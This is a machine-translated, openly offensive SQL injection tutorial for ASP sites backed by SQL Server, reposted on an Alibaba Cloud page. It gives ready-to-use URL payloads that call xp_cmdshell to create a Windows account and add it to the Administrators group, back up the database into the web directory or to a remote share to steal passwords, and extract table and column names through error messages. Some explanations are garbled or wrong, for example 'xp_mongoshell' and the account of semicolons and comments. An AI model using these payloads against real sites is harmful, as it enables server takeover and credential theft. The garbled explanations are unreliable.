Advanced
After reading the introductory and advanced articles, you can practice a little bit to crack common websites. However, if you cannot guess the table name or the program author filters out some special characters, how can you improve the injection success rate? How can we improve the efficiency of guessing? Next, read the advanced article.
Section 1. Inject SQL Server databases using system tables
SQL Server is a powerful database system that is closely related to the operating system, which brings great convenience to developers, it also provides a stepping stone for the inspector. Let's take a look at several specific examples:
① Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net user name password/add "--
Semicolons (;); in SQLServer, separate the First and Second statements, which indicate that the subsequent statements are comments. Therefore, this statement is divided into two statements for execution in SQLServer, first Select the record with ID = 1, and then execute the stored procedure xp_mongoshell. This stored procedure is used to call system commands. Therefore, run the "net" command to create a windows account with the username and password, and then:
② Http: // Site/url. asp? Id = 1; exec master .. xp_cmdshell "net localgroup name administrators/add "--
Add the new account name to the administrator Group. It does not take two minutes. You have obtained the highest system permission! Of course, this method only applies when using sa to connect to the database. Otherwise, you do not have the permission to call xp_mongoshell.
③ Http: // Site/url. asp? Id = 1; and db_name ()> 0
In the preceding example, and user> 0 is used to obtain the connection username. db_name () is another system variable and returns the name of the connected database.
④ Http: // Site/url. asp? Id = 1; backup database name to disk = 'C: inetpubwwwroot1.db ';--
This is a tough trick. Back up the database name obtained from ③ and the absolute path exposed by some IIS errors to the Web Directory, use HTTP to download the entire database. All administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can back up the network address (such as 202.96.xx.xxShare 1.db), but the success rate is not high.
⑤ Http: // Site/url. asp? Id = 1; and (Select Top 1 name from sysobjects where xtype = 'u' and status> 0)> 0
As mentioned above, sysobjects is a system table of SQLServer. It stores all table names, views, constraints, and other objects. xtype = 'u' and status> 0, indicates the name of the table created by the user. The preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message. 2. How can I obtain the name of the third table? Let's leave it to our smart readers.
⑥ Http: // Site/url. asp? Id = 1; and (Select Top 1 col_name (object_id ('Table name'), 1) from sysobjects)> 0
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.